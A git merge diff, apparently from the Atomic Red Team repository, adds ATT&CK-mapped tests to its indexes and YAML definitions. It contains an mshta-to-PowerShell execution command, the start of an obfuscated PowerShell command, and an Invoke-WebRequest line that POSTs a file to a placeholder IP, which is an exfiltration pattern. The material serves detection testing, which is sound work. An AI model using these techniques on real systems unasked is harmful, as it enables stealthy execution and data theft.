Merge branch 'master' into fix/T1222.002

2021-07-27 12:27:28 -06:00
parent da81e35786 eb84927b5f
commit 34d98d07cb
30 changed files with 618 additions and 58 deletions
@@ -385,6 +385,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
 defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
+defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -401,6 +402,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
+defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -798,6 +800,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
@@ -818,6 +822,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
+execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -860,6 +865,7 @@ command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca617
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -871,6 +877,7 @@ command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
@@ -257,6 +257,7 @@ defense-evasion,T1218.005,Mshta,6,Invoke HTML Application - Direct download from
 defense-evasion,T1218.005,Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
 defense-evasion,T1218.005,Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
 defense-evasion,T1218.005,Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
+defense-evasion,T1218.005,Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
 defense-evasion,T1218.007,Msiexec,1,Msiexec.exe - Execute Local MSI file,0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8,command_prompt
 defense-evasion,T1218.007,Msiexec,2,Msiexec.exe - Execute Remote MSI file,bde7d2fe-d049-458d-a362-abda32a7e649,command_prompt
 defense-evasion,T1218.007,Msiexec,3,Msiexec.exe - Execute Arbitrary DLL,66f64bd5-7c35-4c24-953a-04ca30a0a0ec,command_prompt
@@ -272,6 +273,7 @@ defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded P
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
 defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
 defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
+defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
 defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
 defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -528,6 +530,7 @@ command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download
 command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
 command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
@@ -536,6 +539,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
@@ -570,6 +574,8 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
+execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
 execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -584,6 +590,7 @@ execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
+execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt
@@ -11,7 +11,7 @@
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [macos, linux]
+  - Atomic Test #1: ListSecrets [containers]
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
@@ -247,8 +247,8 @@
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -274,7 +274,7 @@
 - [T1546.014 Emond](../../T1546.014/T1546.014.md)
  - Atomic Test #1: Persistance with Event Monitor - emond [macos]
 - [T1611 Escape to Host](../../T1611/T1611.md)
-  - Atomic Test #1: Deploy container using nsenter container escape [linux]
+  - Atomic Test #1: Deploy container using nsenter container escape [containers]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -662,6 +662,7 @@
  - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
  - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
  - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
+  - Atomic Test #10: Mshta used to Execute PowerShell [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -685,6 +686,7 @@
  - Atomic Test #4: Execution from Compressed File [windows]
  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
+  - Atomic Test #7: Obfuscated Command in PowerShell [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -896,8 +898,8 @@
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -1381,10 +1383,10 @@
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1609 Container Administration Command](../../T1609/T1609.md)
-  - Atomic Test #1: ExecIntoContainer [linux, macos]
+  - Atomic Test #1: ExecIntoContainer [containers]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -1436,6 +1438,8 @@
  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #19: PowerShell Command Execution [windows]
+  - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
 - [T1059.006 Python](../../T1059.006/T1059.006.md)
  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
  - Atomic Test #2: Execute Python via scripts (Linux) [linux]
@@ -1470,6 +1474,7 @@
 - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
+  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -1559,6 +1564,7 @@
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
  - Atomic Test #14: whois file download [linux, macos]
+  - Atomic Test #15: File Download via PowerShell [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -1585,6 +1591,7 @@
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
+  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #1: Base64 Encoded data. [macos, linux]
  - Atomic Test #2: XOR Encoded data. [windows]
@@ -9,7 +9,7 @@
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: ListSecrets [macos, linux]
+  - Atomic Test #1: ListSecrets [containers]
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
@@ -103,8 +103,8 @@
 - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
@@ -118,7 +118,7 @@
  - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
  - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
 - [T1611 Escape to Host](../../T1611/T1611.md)
-  - Atomic Test #1: Deploy container using nsenter container escape [linux]
+  - Atomic Test #1: Deploy container using nsenter container escape [containers]
 - T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -430,8 +430,8 @@
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -648,10 +648,10 @@
  - Atomic Test #1: At - Schedule a job [linux]
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1609 Container Administration Command](../../T1609/T1609.md)
-  - Atomic Test #1: ExecIntoContainer [linux, macos]
+  - Atomic Test #1: ExecIntoContainer [containers]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [linux, macos]
-  - Atomic Test #2: CreateCronjob [linux, macos]
+  - Atomic Test #1: ListCronjobs [containers]
+  - Atomic Test #2: CreateCronjob [containers]
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
  - Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
  - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
@@ -470,6 +470,7 @@
  - Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
  - Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
  - Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
+  - Atomic Test #10: Mshta used to Execute PowerShell [windows]
 - [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
  - Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
  - Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
@@ -489,6 +490,7 @@
  - Atomic Test #4: Execution from Compressed File [windows]
  - Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
  - Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
+  - Atomic Test #7: Obfuscated Command in PowerShell [windows]
 - [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
  - Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
 - [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -960,6 +962,7 @@
  - Atomic Test #11: OSTAP Worming Activity [windows]
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+  - Atomic Test #15: File Download via PowerShell [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -983,6 +986,7 @@
  - Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
  - Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
+  - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1038,6 +1042,8 @@
  - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
  - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
  - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
+  - Atomic Test #19: PowerShell Command Execution [windows]
+  - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
 - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
  - Atomic Test #1: Scheduled Task Startup Script [windows]
@@ -1063,6 +1069,7 @@
 - [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
  - Atomic Test #1: Create and Execute Batch Script [windows]
  - Atomic Test #2: Writes text to a file and displays it. [windows]
+  - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
  - Atomic Test #1: WMI Reconnaissance Users [windows]
  - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -552,8 +552,7 @@ credential-access:

 '
      supported_platforms:
-      - macos
-      - linux
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -631,7 +630,9 @@ credential-access:

 '
        name: sh
-        cleanup_command: kubectl --context kind-atomic-cluster delete pod atomic-pod
+        cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod
+
+'
  T1056.004:
    technique:
      external_references:
@@ -11009,8 +11010,7 @@ privilege-escalation:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -11036,8 +11036,7 @@ privilege-escalation:

 '
      supported_platforms:
-      - linux
-      - macos
+      - containers
      input_arguments:
        namespace:
          description: K8s namespace to list
@@ -12434,7 +12433,7 @@ privilege-escalation:
        - https://twitter.com/mauilion/status/1129468485480751104
        - https://securekubernetes.com/scenario_2_attack/
      supported_platforms:
-      - linux
+      - containers
      dependency_executor_name: sh
      dependencies:
      - description: Verify docker is installed.
@@ -28655,6 +28654,28 @@ defense-evasion:
        command: 'Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath
          #{mshta_file_path}'
        name: powershell
+    - name: Mshta used to Execute PowerShell
+      auto_generated_guid: 8707a805-2b76-4f32-b1c0-14e558205772
+      description: 'Use Mshta to execute arbitrary PowerShell. Example is from the
+        2021 Threat Detection Report by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        message:
+          description: Encoded message to include
+          type: string
+          default: Hello,%20MSHTA!
+        seconds_to_sleep:
+          description: How many seconds to sleep/wait
+          type: string
+          default: 5
+      executor:
+        command: 'mshta.exe "about:<hta:application><script language="VBScript">Close(Execute("CreateObject(""Wscript.Shell"").Run%20""powershell.exe%20-nop%20-Command%20Write-Host%20#{message};Start-Sleep%20-Seconds%20#{seconds_to_sleep}"""))</script>''"
+
+'
+        name: command_prompt
  T1218.007:
    technique:
      id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336
@@ -29529,6 +29550,25 @@ defense-evasion:
      executor:
        command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}

+'
+        name: powershell
+    - name: Obfuscated Command in PowerShell
+      auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
+      description: 'This is an obfuscated PowerShell command which when executed prints
+        "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
+        by Red Canary.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: '$cmDwhy =[TyPe]("{0}{1}" -f ''S'',''TrING'')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f''nv'',''cO'',''ert'')  ;  &("{0}{2}{3}{1}{4}"
